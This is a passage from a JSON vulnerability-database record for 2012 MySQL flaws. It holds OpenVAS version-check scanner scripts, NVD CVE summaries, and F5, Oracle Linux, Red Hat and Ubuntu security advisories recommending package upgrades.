http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html\n http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1621-1\";\ntag_affected = \"mysql-5.5 on Ubuntu 12.10 ,\n Ubuntu 12.04 LTS ,\n Ubuntu 11.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1621-1/\");\n script_id(841207);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-11-06 17:48:44 +0530 (Tue, 06 Nov 2012)\");\n script_cve_id(\"CVE-2012-3144\", \"CVE-2012-3147\", \"CVE-2012-3149\", \"CVE-2012-3150\",\n \"CVE-2012-3156\", \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\",\n \"CVE-2012-3166\", \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\",\n \"CVE-2012-3180\", \"CVE-2012-3197\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1621-1\");\n script_name(\"Ubuntu Update for mysql-5.5 USN-1621-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.28-0ubuntu0.12.04.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0ubuntu0.11.10.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.1\", ver:\"5.1.66-0ubuntu0.10.04.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"mysql-server-5.5\", ver:\"5.5.28-0ubuntu0.12.10.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-03T10:56:29", "bulletinFamily": "scanner", "description": "Check for the Version of mysql", "modified": "2018-01-03T00:00:00", "published": "2012-11-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870861", "id": "OPENVAS:870861", "title": "RedHat Update for mysql RHSA-2012:1462-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for mysql RHSA-2012:1462-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n This update fixes several vulnerabilities in the MySQL database server.\n Information about these flaws can be found on the Oracle Critical Patch\n Update Advisory pages, listed in the References section. (CVE-2012-1688,\n CVE-2012-1690, CVE-2012-1703, CVE-2012-2749, CVE-2012-0540, CVE-2012-1689,\n CVE-2012-1734, CVE-2012-3163, CVE-2012-3158, CVE-2012-3177, CVE-2012-3166,\n CVE-2012-3173, CVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\n CVE-2012-3160)\n\n These updated packages upgrade MySQL to version 5.1.66. Refer to the MySQL\n release notes listed in the References section for a full list of changes.\n\n All MySQL users should upgrade to these updated packages, which correct\n these issues. After installing this update, the MySQL server daemon\n (mysqld) will be restarted automatically.\";\n\ntag_affected = \"mysql on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-November/msg00010.html\");\n script_id(870861);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-11-15 11:40:01 +0530 (Thu, 15 Nov 2012)\");\n script_cve_id(\"CVE-2012-0540\", \"CVE-2012-1688\", \"CVE-2012-1689\", \"CVE-2012-1690\",\n \"CVE-2012-1703\", \"CVE-2012-1734\", \"CVE-2012-2749\", \"CVE-2012-3150\",\n \"CVE-2012-3158\", \"CVE-2012-3160\", \"CVE-2012-3163\", \"CVE-2012-3166\",\n \"CVE-2012-3167\", \"CVE-2012-3173\", \"CVE-2012-3177\", \"CVE-2012-3180\",\n \"CVE-2012-3197\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:1462-01\");\n script_name(\"RedHat Update for mysql RHSA-2012:1462-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.66~1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.66~1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-debuginfo\", rpm:\"mysql-debuginfo~5.1.66~1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.1.66~1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-libs\", rpm:\"mysql-libs~5.1.66~1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.1.66~1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.1.66~1.el6_3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-07-25T12:21:59", "bulletinFamily": "scanner", "description": "The host is running Oracle MySQL server and is prone to multiple\n vulnerabilities.", "modified": "2019-07-24T00:00:00", "published": "2012-11-26T00:00:00", "id": "OPENVAS:1361412562310803112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803112", "title": "Oracle MySQL Server Multiple Vulnerabilities-02 Nov12 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Server Multiple Vulnerabilities-02 Nov12 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mysql:mysql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803112\");\n script_version(\"2019-07-24T11:36:46+0000\");\n script_cve_id(\"CVE-2012-3180\", \"CVE-2012-3177\", \"CVE-2012-3160\");\n script_bugtraq_id(56003, 56005, 56027);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 11:36:46 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-11-26 17:27:23 +0530 (Mon, 26 Nov 2012)\");\n script_name(\"Oracle MySQL Server Multiple Vulnerabilities-02 Nov12 (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51008/\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/advisories/51008\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\");\n script_xref(name:\"URL\", value:\"https://support.oracle.com/rs?type=doc&id=1475188.1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Databases\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to disclose potentially\n sensitive information, manipulate certain data and cause a DoS (Denial of Service).\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL version 5.1.x to 5.1.65 and\n Oracle MySQL version 5.5.x to 5.5.27 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to multiple unspecified errors in MySQL server component\n related to server installation and server optimizer.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the references or upgrade to latest version.\");\n\n script_tag(name:\"summary\", value:\"The host is running Oracle MySQL server and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!vers = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nvers = eregmatch(pattern:\"([0-9.a-z]+)\", string:vers);\nif(vers[1])\n{\n if(version_in_range(version:vers[1], test_version:\"5.1.0\", test_version2:\"5.1.65\") ||\n version_in_range(version:vers[1], test_version:\"5.5.0\", test_version2:\"5.5.27\")){\n report = report_fixed_ver(installed_version:vers[1], fixed_version:\"Apply the patch\");\n security_message(data:report, port:port);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2019-07-25T12:22:20", "bulletinFamily": "scanner", "description": "The host is running Oracle MySQL server and is prone to multiple\n vulnerabilities.", "modified": "2019-07-24T00:00:00", "published": "2012-11-26T00:00:00", "id": "OPENVAS:1361412562310803113", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803113", "title": "Oracle MySQL Server Multiple Vulnerabilities-03 Nov12 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle MySQL Server Multiple Vulnerabilities-03 Nov12 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mysql:mysql\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803113\");\n script_version(\"2019-07-24T11:36:46+0000\");\n script_cve_id(\"CVE-2012-3173\", \"CVE-2012-3167\", \"CVE-2012-3166\");\n script_bugtraq_id(56041, 56018, 56028);\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-24 11:36:46 +0000 (Wed, 24 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-11-26 17:50:23 +0530 (Mon, 26 Nov 2012)\");\n script_name(\"Oracle MySQL Server Multiple Vulnerabilities-03 Nov12 (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/51008/\");\n script_xref(name:\"URL\", value:\"http://www.securelist.com/en/advisories/51008\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\");\n script_xref(name:\"URL\", value:\"https://support.oracle.com/rs?type=doc&id=1475188.1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Databases\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_dependencies(\"mysql_version.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/mysql\", 3306);\n script_mandatory_keys(\"MySQL/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to disclose potentially\n sensitive information, manipulate certain data.\");\n\n script_tag(name:\"affected\", value:\"Oracle MySQL version 5.1.x to 5.1.63 and\n Oracle MySQL version 5.5.x to 5.5.25 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to multiple unspecified errors in MySQL server component\n vectors related to InnoDB plugin, server full text search and InnoDB.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced vendor advisory or upgrade to latest version.\");\n\n script_tag(name:\"summary\", value:\"The host is running Oracle MySQL server and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!vers = get_app_version(cpe:CPE, port:port))\n exit(0);\n\nvers = eregmatch(pattern:\"([0-9.a-z]+)\", string:vers);\nif(vers[1])\n{\n if(version_in_range(version:vers[1], test_version:\"5.1.0\", test_version2:\"5.1.63\") ||\n version_in_range(version:vers[1], test_version:\"5.5.0\", test_version2:\"5.5.25\")){\n report = report_fixed_ver(installed_version:vers[1], fixed_version:\"Apply the patch\");\n security_message(data:report, port:port);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.\nPer: http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html\r\n\r\n\"The CVSS Base Score is 9.0 only for Windows. For Linux, Unix and other platforms, the CVSS Base Score is 6.5, and the impacts for Confidentiality, Integrity and Availability are Partial+.\"", "modified": "2017-08-29T01:31:00", "id": "CVE-2012-3163", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3163", "published": "2012-10-17T00:55:00", "title": "CVE-2012-3163", "type": "cve", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-10-10T12:12:59", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server.", "modified": "2019-10-07T16:42:00", "id": "CVE-2012-3177", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3177", "published": "2012-10-17T00:55:00", "title": "CVE-2012-3177", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.", "modified": "2017-08-29T01:31:00", "id": "CVE-2012-3150", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3150", "published": "2012-10-16T23:55:00", "title": "CVE-2012-3150", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:12:26", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.\nper http://www.openwall.com/lists/oss-security/2012/12/02/3, this vulnerability is only on linux-based software installations", "modified": "2017-09-19T01:35:00", "id": "CVE-2012-5611", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-5611", "published": "2012-12-03T12:49:00", "title": "CVE-2012-5611", "type": "cve", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin.", "modified": "2017-08-29T01:31:00", "id": "CVE-2012-3173", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3173", "published": "2012-10-17T00:55:00", "title": "CVE-2012-3173", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2019-10-10T12:12:58", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation.", "modified": "2019-10-07T16:42:00", "id": "CVE-2012-3160", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3160", "published": "2012-10-16T23:55:00", "title": "CVE-2012-3160", "type": "cve", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Protocol.", "modified": "2017-08-29T01:31:00", "id": "CVE-2012-3158", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3158", "published": "2012-10-16T23:55:00", "title": "CVE-2012-3158", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-10T12:12:59", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB.", "modified": "2019-10-07T16:42:00", "id": "CVE-2012-3166", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3166", "published": "2012-10-17T00:55:00", "title": "CVE-2012-3166", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.", "modified": "2017-08-29T01:31:00", "id": "CVE-2012-3180", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3180", "published": "2012-10-17T00:55:00", "title": "CVE-2012-3180", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:12:23", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search.", "modified": "2018-12-04T17:06:00", "id": "CVE-2012-3167", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3167", "published": "2012-10-17T00:55:00", "title": "CVE-2012-3167", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2016-09-26T17:22:59", "bulletinFamily": "software", "description": "Recommended action\n\nTo eliminate this vulnerability, upgrade to a version that is listed in the **Versions known to be not vulnerable** column in the previous table.\n\nTo mitigate this vulnerability on Enterprise Manager, you should not enable remote access to the statistics database. Remote access to the statistics database is not enabled by default. \n\n\n**Impact of action:** When you configure managed devices to perform statistics data collection, they cannot send collected statistics to the Enterprise Manager system. Additionally, when you configure a system to perform a remote backup of a local statistics database, the system will be unable to access the statistics database. \n\n\nSupplemental Information\n\n * For information about configuring statistics collection and enabling remote access to the statistics database, refer to the one of the following manuals: \n \n\n * For Enterprise Manager 3.1.0 and later, refer to the **Overview: Health and performance monitoring statistics** chapter of the Enterprise Manager: Monitoring Network Health and Activity guide\n * For Enterprise Manager 3.0.0, refer to the **Collecting Services** chapter of the Enterprise Manager: Monitoring Network Health and Activity guide\n * For Enterprise Manager 2.0.0 - 3.0.0, refer to the **Monitoring Object and Device Performance** chapter of the Enterprise Manager Administrator Guide\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-07-07T00:00:00", "published": "2014-01-14T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/14000/900/sol14907.html", "id": "SOL14907", "title": "SOL14907 - MySQL Server vulnerability CVE-2012-3163", "type": "f5", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:50", "bulletinFamily": "unix", "description": "[5.1.66-1]\n- Update to 5.1.66, for assorted upstream bugfixes including\n CVEs announced in July and October 2012\nResolves: #871813", "modified": "2012-11-14T00:00:00", "published": "2012-11-14T00:00:00", "id": "ELSA-2012-1462", "href": "http://linux.oracle.com/errata/ELSA-2012-1462.html", "title": "mysql security update", "type": "oraclelinux", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:15", "bulletinFamily": "unix", "description": "[5.1.66-2]\n- Add backported patch for CVE-2012-5611\nResolves: CVE-2012-5611", "modified": "2012-12-07T00:00:00", "published": "2012-12-07T00:00:00", "id": "ELSA-2012-1551", "href": "http://linux.oracle.com/errata/ELSA-2012-1551.html", "title": "mysql security update", "type": "oraclelinux", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:40", "bulletinFamily": "unix", "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nThis update fixes several vulnerabilities in the MySQL database server.\nInformation about these flaws can be found on the Oracle Critical Patch\nUpdate Advisory pages, listed in the References section. (CVE-2012-1688,\nCVE-2012-1690, CVE-2012-1703, CVE-2012-2749, CVE-2012-0540, CVE-2012-1689,\nCVE-2012-1734, CVE-2012-3163, CVE-2012-3158, CVE-2012-3177, CVE-2012-3166,\nCVE-2012-3173, CVE-2012-3150, CVE-2012-3180, CVE-2012-3167, CVE-2012-3197,\nCVE-2012-3160)\n\nThese updated packages upgrade MySQL to version 5.1.66. Refer to the MySQL\nrelease notes listed in the References section for a full list of changes.\n\nAll MySQL users should upgrade to these updated packages, which correct\nthese issues. After installing this update, the MySQL server daemon\n(mysqld) will be restarted automatically.\n", "modified": "2018-06-06T20:24:24", "published": "2012-11-14T05:00:00", "id": "RHSA-2012:1462", "href": "https://access.redhat.com/errata/RHSA-2012:1462", "type": "redhat", "title": "(RHSA-2012:1462) Important: mysql security update", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:36", "bulletinFamily": "unix", "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nA stack-based buffer overflow flaw was found in the user permission\nchecking code in MySQL. An authenticated database user could use this flaw\nto crash the mysqld daemon or, potentially, execute arbitrary code with the\nprivileges of the user running the mysqld daemon. (CVE-2012-5611)\n\nAll MySQL users should upgrade to these updated packages, which correct\nthis issue. After installing this update, the MySQL server daemon (mysqld)\nwill be restarted automatically.\n", "modified": "2018-06-06T20:24:17", "published": "2012-12-07T05:00:00", "id": "RHSA-2012:1551", "href": "https://access.redhat.com/errata/RHSA-2012:1551", "type": "redhat", "title": "(RHSA-2012:1551) Important: mysql security update", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2019-05-29T17:23:25", "bulletinFamily": "unix", "description": "Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.1.66 in Ubuntu 10.04 LTS and Ubuntu 11.10. Ubuntu 12.04 LTS and Ubuntu 12.10 have been updated to MySQL 5.5.28.\n\nIn addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.\n\nPlease see the following for more information:\n\n<http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html> <http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html> <http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html>", "modified": "2012-11-05T00:00:00", "published": "2012-11-05T00:00:00", "id": "USN-1621-1", 